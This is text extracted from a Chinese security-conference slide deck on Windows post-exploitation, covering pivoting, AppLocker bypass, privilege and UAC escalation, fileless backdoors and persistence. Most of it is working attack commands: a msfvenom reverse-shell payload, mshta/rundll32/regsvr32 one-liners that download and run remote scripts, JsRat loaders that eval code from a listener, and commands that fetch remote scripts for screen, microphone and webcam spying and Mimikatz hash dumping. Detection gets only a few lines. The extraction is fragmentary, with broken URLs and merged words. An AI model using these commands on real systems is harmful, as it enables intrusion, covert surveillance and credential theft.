1、Shell is Only the Beginning后渗透阶段的攻防对抗,3gstudent & Evi1cg,As a offensive researcher, if you can dream it,someone has likelyalready done it and that someone isnt the kind of person who speaks at security cons,Matt Graeber,3gstudent,Good Study,Good Health,Good Attitude,Evi1cg,Thin,WhiteHat,Security Res
2、earcher,后渗透阶段,渗透测试以特定的业务系统作为目标,识 别出关键的基础设施,并寻找客 户组织最具价值和尝试进行安全保护的信息和资产,黑客攻击黑客对攻击战果进一步扩大,以及尽可能隐藏自身痕迹的过程,打开一扇窗,Open Proxy,绕过看门狗,我来作主人,Bypass Application Whitelisting ,Escalate Privileges,屋里有什么,Gather Information,我来抓住你,Detection and Mitigations,挖一个密道,Persistence,目录,打开一扇窗Open Proxy,为什么用代理?, 更好地接触到目标所处环境
3、, 使用已有shell的机器作为跳板,扩大战果 Its the beginning,常用方法,端口转发:Client- Lcx, Netsh;,HTTP- Tunnel;,Metasploit- Portpwd,HTTP- ReGeorg; Metasploit- Socks4a,Socks代理:Client- Ew,Xsocks;其他:SSH, ICMP 等Vpn,!,然而,我们可能会碰到这样的情况:, 安装杀毒软件,拦截“恶意”程序, 设置应用程序白名单,限制白名单以外的程序运行,eg:Windows Applocker,Windows AppLocker,简介:,即“应用程序控制策略”,
4、可用来对可执行程序、安装程序和脚本进行控制开启默认规则后,除了默认路径可以执行外,其他路径均无法执行程序和脚本,绕过看门狗,Bypass Application Whitelisting,绕过思路, Hta, Office Macro Cpl Chm, Powershell Rundll32 Regsvr32 Regsvcs, Installutil,1、Hta,More:, Mshta.exe,vbscript:CreateObject(“Wscript.Shell“).Run(“calc.exe“,0,true)(window.close), Mshta.exe javascript:“m
5、shtml,RunHTMLApplication,“;document.write();h=new%20ActiveXObject(“WScript.Shell“).run(“calc.exe“,0,true);tryh.Send();b=h.ResponseText;eval(b);catch(e)new%20ActiveXObject(“WScript.Shell“).Run(“cmd /c taskkill /f /immshta.exe“,0,true);,2、Office Macro,MacroRaptor:, Detect malicious VBA Macros Python,
6、https:/bitbucket.org/decalage/oletools/wiki/mraptor,3、CplDLL/CPL:生成Payload.dll: msfvenom -p windows/meterpreter/reverse_tcp-B x00xff lhost=192.168.127.132 lport=8888 -f dll -o payload.dll,(1) 直接运行dll: rundll32 shell32.dll,Control_RunDLL payload.dll (2) 将dll重命名为cpl,双击运行 (3) 普通的dll直接改后缀名,From: http:/d
7、rops.wooyun.org/tips/16042,4、Chm,高级组合技打造“完美” 捆绑后门:http:/drops.wooyun.org/tips/14254,利用系统CHM文件实现隐蔽后门:,那些年我们玩过的奇技淫巧,5、Powershell,Command: powershell-nop -exec Bypass -c IEX (New-OBjectet.WeBClient).DownloadString(http:/ip:port/) Get-Content payload.ps1 | iex cmd.exe /K payload.batLnk: powershell-nop -
8、windows hidden -E YwBhAGwAYwAuAGUAeABlAA=,如果禁用powershell: 通过.Net执行powershell:https:/B p0wnedShell:https:/githuB.com/Cn33liz/p0wnedShell PowerOPS:https:/laBs.portcullis.co.uk/Blog/powerops-powershell-for-offensive-operations/,6、Rundll32,javascript :,rundll32.exe javascript:“mshtml,RunHTMLApplication
9、”;document.write();new%20ActiveXOBject(“WScript.Shell”).Run(“powershell -nop-exec Bypass -c IEX (New-OBject Net.WeBClient).DownloadString(http:/ip:port/);”),Dll:,rundll32 shell32.dll,Control_RunDLL payload.dll,From: http:/drops.wooyun.org/tips/11764,7、Regsvr32Regsvr32.exe(.sct):三种启动方式:regsvr32 /u /n
10、 /s /i:payload.sct scroBj.dllregsvr32 /u /n /s /i:http:/ip:port/payload.sct scroBj.dll右键注册,From:,http:/suBt0x10.Blogspot.jp/2016/04/Bypass-application-whitelisting-script.html http:/drops.wooyun.org/tips/15124,8、RegsvcsRegasm & Regsvcs:创建key - key.snk $key = BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z
11、64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZBp6qukLH0lLEq/vW979GWzVA gSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhBdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkBix8MTgEt7hD1DC2hXv7dKaC5 31ZWqGXB54OnuvFBD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS
12、+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitoluf o7Ucjh+WvZAU/dzrGny5stQtTmLxdhZBOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FBdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU 0wRvkWiZRerjmDdehJIBoWsx4V8aiWx8FPPngEmNz89tBAQ8zBIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4
13、zHc gJx6FpVK7qeEuvyV0OGKvNor9B/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3r pZ9tBLZUefrFnLNiHfVjNi53Yg4= $Content = System.Convert:FromBase64String($key) Set-Content key.snk -Value $Content -Encoding Byte 编译: C:WindowsMicrosoft.NETFrameworkv4.0
14、.30319csc.exe /r:System.EnterpriseServices.dll /target:liBrary/out:Regasm.dll /keyfile:key.snk Regasm.cs 运行: C:WindowsMicrosoft.NETFrameworkv4.0.30319regsvcs.exe Regasm.dll OR C:WindowsMicrosoft.NETFrameworkv4.0.30319regasm.exe Regasm.dll /如果没有管理员权限使用/U来运行,C:WindowsMicrosoft.NETFrameworkv4.0.30319re
15、gsvcs.exe /U Regasm.dll C:WindowsMicrosoft.NETFrameworkv4.0.30319regasm.exe /U Regasm.dll,From: https:/gist.githuB.com/suBTee/e1c54e1fdafc15674c9a,9、InstallutilInstallUtil:编译:C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe /unsafe /platform:x64 /out:InstallUtil.exe InstallUtil.cs编译以后用/U参数运行:C:Win
16、dowsMicrosoft.NETFramework64v4.0.30319InstallUtil.exe /U InstallUtil.exe,From:,http:/suBt0x10.Blogspot.jp/2015/08/application-whitelisting-Bypasses-101.html http:/drops.wooyun.org/tips/8862,10、可执行目录,通过ps脚本扫描可写入的路径,脚本下载地址:http:/go.mssec.se/AppLockerBC,From: http:/drops.wooyun.org/tips/11804,11、最直接的方式
17、,提权,我来作主人,Escalate Privileges,常见的提权方式, 本地提权漏洞, 服务提权, 协议, Phishing,本地提权,根据补丁号来确定是否存在漏洞的脚本:,https:/githuB.com/GDSSecurity/Windows-Exploit-Suggester将受害者计算机systeminfo导出到文件:Systeminfo 1.txt,使用脚本判断存在的漏洞:,python windows-exploit-suggester.py-dataBase 2016-05-31-mssB.xls - systeminfo/Desktop/1.txt,可能遇到的问题,Ex
18、p被杀!,将Exp改成Powershell:,http:/evi1cg.me/archives/MS16-032-Windows-Privilege-Escalation.html,Demo Time,服务提权,常用服务:,Mssql,Mysql,Oracle,Ftp第三方服务:,Dll劫持,文件劫持,提权脚本Powerup:,http:/drops.wooyun.org/tips/11989,协议提权,利用已知的Windows中的问题,以获得本地权限提升 - Potato,其利用NTLM中继(特别是基于HTTP SMB中继)和NBNS欺骗进行提权。详情:,http:/tools.pwn.re
19、n/2016/01/17/potato-windows.html,Phishing,MSF Ask模块:,exploit/windows/local/ask,通过runas方式来诱导用户通过点击uac验证来获取最高权限。需要修改的msf脚本,metasploit/lib/msf/core/post/windows/runas.rb,Phishing Demo,屋里有什么,Gather Information,Gather Information,成为了主人,或许我们需要看看屋里里面有什么?两种情况:,1:已经提权有了最高权限,为所欲为,2:未提权,用户还有UAC保护,还不能做所有的事情,Byp
20、ass UAC,常用方法:, 使用IFileOperation COM接口 使用Wusa.exe的extract选项 远程注入SHELLCODE 到傀儡进程 DLL劫持,劫持系统的DLL文件 直接提权过UAC Phishing,http:/evi1cg.me/archives/Powershell_Bypass_UAC.html http:/ Tips,通过脚本弹出认证窗口,让用户输入账号密码,由此得到用户的明文密 码。,powershell脚本如下:,From:https:/ Tips,MSF模块,post/windows/gather/phish_windows_credentials,更
21、多参考Installed ProgramsStartup ItemsInstalled Services,File/Printer Shares DatabaseServers,Certificate Authority,Security ServicesSensitive Data,Key-logging,Screen capture,Network traffic capture,User InformationSystem Configuration,Password Policy,Security Policies,Configured Wireless Networks and Ke
22、ys,新的攻击方法,无文件,无文件姿势之(一)-Powershell,屏幕监控:,powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(http:/evi1cg.me/powershell/Show-TargetScreen.ps1); Show-TargetScreen”,录音:,powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(https:/ -Path $env:TEMPsecr
23、et.wav -Length 10 -Alias SECRET”,摄像头监控:,powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(https:/ Capture-MiniEye -RecordTime 2 -Path $env:temphack.avi”-Path $env:temphack.avi”,抓Hash:,powershell IEX (New-Object Net.WebClient).DownloadString(https:/ IEX (New-Object Net.We
24、bClient).DownloadString(https:/ Invoke-Mimikatz,无文件姿势之(一)-Powershell,Empire:,Metasploit:,无文件姿势之(二)- js,JsRat:,rundll32.exe javascript:“mshtml,RunHTMLApplication,“;document.write();h=new%20ActiveXObject(“WinHttp.WinHttpRequest. 5.1“);h.Open(“GET“,“http:/127.0.0.1:8081/connect“,false);tryh.S end();b=h
25、.ResponseText;eval(b);catch(e)new%20ActiveXObject(“WSc ript.Shell“).Run(“cmd /c taskkill /f /im rundll32.exe“,0,true);,From:,JavaScript Backdoor http:/drops.wooyun.org/tips/11764 JavaScript Phishing http:/drops.wooyun.org/tips/12386,无文件姿势之(三)- mshta,启动JsRat:,Mshta javascript:“mshtml,RunHTMLApplicati
26、on “;document.write();h=new%20ActiveXObject(“WinHttp .WinHttpRequest.5.1“);h.Open(“GET“,“http:/192.16 8.2.101:9998/connect“,false);tryh.Send();b=h.Res ponseText;eval(b);catch(e)new%20ActiveXObject(“ WScript.Shell“).Run(“cmd /c taskkill /f /im mshta.exe“,0,true);,无文件姿势之(四)- sctSCT:,regsvr32 /u /s,Cal
27、c.sct,/i:http:/urlto/calc.sct scrobj.dllFrom: Use SCT to Bypass Application Whitelisting Protection http:/drops.wooyun.org/tips/15124,无文件姿势之(五) - wscWsc:,rundll32.exe javascript:“mshtml,RunHTMLApplic ation,Calc.wsc,“;document.write();GetObject(“script :http:/urlto/calc.wsc“)From: WSC、JSRAT and WMI B
28、ackdoor http:/drops.wooyun.org/tips/15575,Demo Time,挖一个密道Persistence,常见方法,启动项注册表wmiat,schtasks,利用已有的第三方服务,新方法,Bitsadmin:, 需要获得管理员权限, 可开机自启动、间隔启动, 适用于Win7 、Win8、Server 2008及以上操作系统 可绕过Autoruns对启动项的检测, 已提交至MSRC(Microsoft Security Response Center),Demo Time,我来抓住你,Detection and Mitigations,Detection and Mitigations, bitsadmin /list /allusers /verbose, Stop Background Intelligent Transfer Service,Detection and Mitigations,关注drops,Special thanks to,Casey Smith subTee,Reference,1、Shell is Only the Beginning quote from Carlos Perezs Bloghttp:/ Matt Graebers idea quote from,https:/
